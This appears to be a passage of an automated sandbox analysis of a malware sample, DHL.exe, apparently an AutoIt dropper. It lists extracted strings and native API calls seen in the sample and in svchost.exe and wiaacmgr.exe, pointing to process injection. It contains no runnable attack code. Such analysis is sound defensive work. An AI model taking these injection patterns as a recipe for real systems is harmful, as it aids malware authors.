                Source: DHL.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_48831035-2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CB43 NtClose,2_2_0042CB43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA5A NtDelayExecution,2_2_0040AA5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,2_2_03472C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C4650 NtSuspendThread,LdrInitializeThunk,5_2_048C4650
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C4340 NtSetContextThread,LdrInitializeThunk,5_2_048C4340
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_048C2CA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2C60 NtCreateKey,LdrInitializeThunk,5_2_048C2C60
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_048C2C70
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2DD0 NtDelayExecution,LdrInitializeThunk,5_2_048C2DD0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_048C2DF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_048C2D10
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_048C2D30
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_048C2E80
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_048C2EE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2FB0 NtResumeThread,LdrInitializeThunk,5_2_048C2FB0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2FE0 NtCreateFile,LdrInitializeThunk,5_2_048C2FE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2F30 NtCreateSection,LdrInitializeThunk,5_2_048C2F30
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2AD0 NtReadFile,LdrInitializeThunk,5_2_048C2AD0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2AF0 NtWriteFile,LdrInitializeThunk,5_2_048C2AF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_048C2BA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_048C2BE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_048C2BF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2B60 NtClose,LdrInitializeThunk,5_2_048C2B60
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C35C0 NtCreateMutant,LdrInitializeThunk,5_2_048C35C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C39B0 NtGetContextThread,LdrInitializeThunk,5_2_048C39B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2CC0 NtQueryVirtualMemory,5_2_048C2CC0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2CF0 NtOpenProcess,5_2_048C2CF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2C00 NtQueryInformationProcess,5_2_048C2C00
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2DB0 NtEnumerateKey,5_2_048C2DB0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2D00 NtSetInformationFile,5_2_048C2D00
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2EA0 NtAdjustPrivilegesToken,5_2_048C2EA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2E30 NtWriteVirtualMemory,5_2_048C2E30
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2F90 NtProtectVirtualMemory,5_2_048C2F90
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2FA0 NtQuerySection,5_2_048C2FA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2F60 NtCreateProcessEx,5_2_048C2F60
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2AB0 NtWaitForSingleObject,5_2_048C2AB0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C2B80 NtQueryInformationFile,5_2_048C2B80
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C3090 NtSetValueKey,5_2_048C3090
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C3010 NtOpenDirectoryObject,5_2_048C3010
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C3D10 NtOpenProcessToken,5_2_048C3D10
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C3D70 NtOpenThread,5_2_048C3D70
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_02879720 NtReadFile,5_2_02879720
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_028795B0 NtCreateFile,5_2_028795B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_02879A20 NtAllocateVirtualMemory,5_2_02879A20
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_028798B0 NtClose,5_2_028798B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_02879810 NtDeleteFile,5_2_02879810
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A0D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00A0D5EB
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00A01201
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A0E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00A0E8F6
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A120460_2_00A12046
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009A80600_2_009A8060
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A082980_2_00A08298
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009DE4FF0_2_009DE4FF
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009D676B0_2_009D676B
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A348730_2_00A34873
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009CCAA00_2_009CCAA0
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009ACAF00_2_009ACAF0
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009BCC390_2_009BCC39
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009D6DD90_2_009D6DD9
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009A91C00_2_009A91C0
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009BB1190_2_009BB119
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C13940_2_009C1394
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C17060_2_009C1706
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C781B0_2_009C781B
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C19B00_2_009C19B0
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009A79200_2_009A7920
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009B997D0_2_009B997D
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C7A4A0_2_009C7A4A
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C7CA70_2_009C7CA7
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C1C770_2_009C1C77
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009D9EEE0_2_009D9EEE
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A2BE440_2_00A2BE44
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C1F320_2_009C1F32
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00E165F80_2_00E165F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418A232_2_00418A23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030102_2_00403010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F1732_2_0042F173
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041024A2_2_0041024A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004102532_2_00410253
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012202_2_00401220
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B802_2_00402B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004043B52_2_004043B5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004104732_2_00410473
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4732_2_0040E473
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C102_2_00416C10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C132_2_00416C13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024D02_2_004024D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E5C32_2_0040E5C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E5B82_2_0040E5B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027402_2_00402740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F41A22_2_034F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034856302_2_03485630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035095C32_2_035095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E1AA32_2_034E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D59102_2_034D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD22_2_03403FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD52_2_03403FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0493E4F65_2_0493E4F6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049344205_2_04934420
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049424465_2_04942446
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049505915_2_04950591
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048905355_2_04890535
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048AC6E05_2_048AC6E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0488C7C05_2_0488C7C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048B47505_2_048B4750
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048907705_2_04890770
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049220005_2_04922000
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049441A25_2_049441A2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049501AA5_2_049501AA
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049481CC5_2_049481CC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048801005_2_04880100
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0492A1185_2_0492A118
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049181585_2_04918158
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049102C05_2_049102C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049302745_2_04930274
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049503E65_2_049503E6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0489E3F05_2_0489E3F0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494A3525_2_0494A352
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04930CB55_2_04930CB5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04880CF25_2_04880CF2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04890C005_2_04890C00
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048A8DBF5_2_048A8DBF
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0488ADE05_2_0488ADE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0489AD005_2_0489AD00
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0492CD1F5_2_0492CD1F
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494CE935_2_0494CE93
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048A2E905_2_048A2E90
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494EEDB5_2_0494EEDB
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494EE265_2_0494EE26
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04890E595_2_04890E59
